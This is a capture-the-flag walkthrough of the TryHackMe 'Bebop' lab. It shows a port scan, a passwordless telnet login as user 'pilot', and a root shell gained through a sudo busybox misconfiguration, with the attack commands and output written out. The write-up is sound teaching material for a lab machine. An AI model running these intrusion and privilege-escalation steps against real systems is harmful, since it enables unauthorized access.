The Bebop room is a free, easy room created by tryhackme and ar33zy. The room is themed around trying to compromise a drone hence the tagline “Who thought making a flying shell was a good idea?”.

The room requires one to leverage on the existing vulnerabilities to not only find two flags - user and root flags - but also answer a series of questions about the user account, application that was leveraged on to escalate privileges, the service that provided first entry and the operating system of the “drone”.

Task 0.1 - Connect to our network and start up the machine

For the purposes of this guide, we shall configure a few variables to represent the victim and attacker IPs.

# One should change the below IPs to match their environment

> victim=10.10.179.208 # The IP of the victim's machine. 
> attacker=10.17.69.220 # The IP of our attacking machine.

Task 1 - Takeoff!

This requires us to deploy the machine and answer the question of the codename. The clue for this is in the write-up for this task. You will need this codename for the next task.

Task 2 - Manouvre

We will need to identify what services are running on the drone. We can start with a simple port scanner against the IP provided by the VM.

> rustscan -a $victim
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
\U0001f30dHACK THE PLANET\U0001f30d

[~] The config file is expected to be at "/home/rustscan/.rustscan.toml"
[~] File limit higher than batch size. Can increase speed by increasing batch size '-b 1048476'.
Open 10.10.216.132:22
Open 10.10.216.132:23
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")

... [REDACTED for brevity]

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack
23/tcp open  telnet  syn-ack

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.21 seconds

From the scan, we notice that there are two services running:

  • ssh on port 22.
  • telnet on port 23.

We can attempt to telnet into the port and, if asked for an account name, we can try and use the codename that we discovered in the previous task.

> telnet $victim
Trying 10.10.216.132...
Connected to 10.10.216.132.
Escape character is '^]'.
login: pilot
Last login: Sat Oct  5 23:48:53 from cpc147224-roth10-2-0-cust456.17-1.cable.virginm.net
FreeBSD 11.2-STABLE (GENERIC) #0 r345837: Thu Apr  4 02:07:22 UTC 2019

Welcome to FreeBSD!

...[REDACTED for brevity]

Edit /etc/motd to change this login announcement.
If you `set watch = (0 any any)' in tcsh, you will be notified when
someone logs in or out of your system.

[CODENAME@freebsd ~]$

# Let's list the contents in the directory and see whether we can find the user flag.
> ls
user.txt
> cat user.txt
[USER FLAG HERE]

It seems we can get acces to a session without a password and, when we list the contents of the directory, we can find the user flag.

To find the root flag, we will need to find a vulnerability that we can exploit. In finding this exploit, I followed the pathway below:

  • Listed the current commands I could access using the sudo -l command. Its clear that I can use busybox without a password as one of the commands.
  • Visited gtfobins to find how I can exploit this command to escalate my privileges using the sudo command. Simply running a shell as a parameter to the command with sudo allows me to escalate my privileges.
  • As an escalated user, I can search the system for the root flag and complete the challenge.
> sudo -l
User pilot may run the following commands on freebsd:
    (root) NOPASSWD: /usr/local/bin/busybox
    
> sudo busybox sh
# # Escalated to root.

> find / -type f -user root -name "root.txt" 2>/dev/null
/root/root.txt

> cat /root/root.txt
[ROOT FLAG HERE]

## NOTE: The last two commands above can be done in one line as below

> find / -type f -user root -name "root.txt" -exec cat {} \; 2>/dev/null
[ROOT FLAG HERE]

Task 3 - Quiz!

The above two tasks have given us enough information to answer the questions that follow:

  1. What is the low privilege user? - From the codename that you discovered.
  2. What binary was used to escalate privileges? - From the sudo -l command.
  3. What service was used to gain an initial shell access? - Refer to the rustscan output.
  4. What Operating System does the drone use? - Read to the information provided by the console when you logged into the drone through the initial service.

Task 4 - Conclusion

Watch the DEFCON 23 talk and enjoy the story!

The End!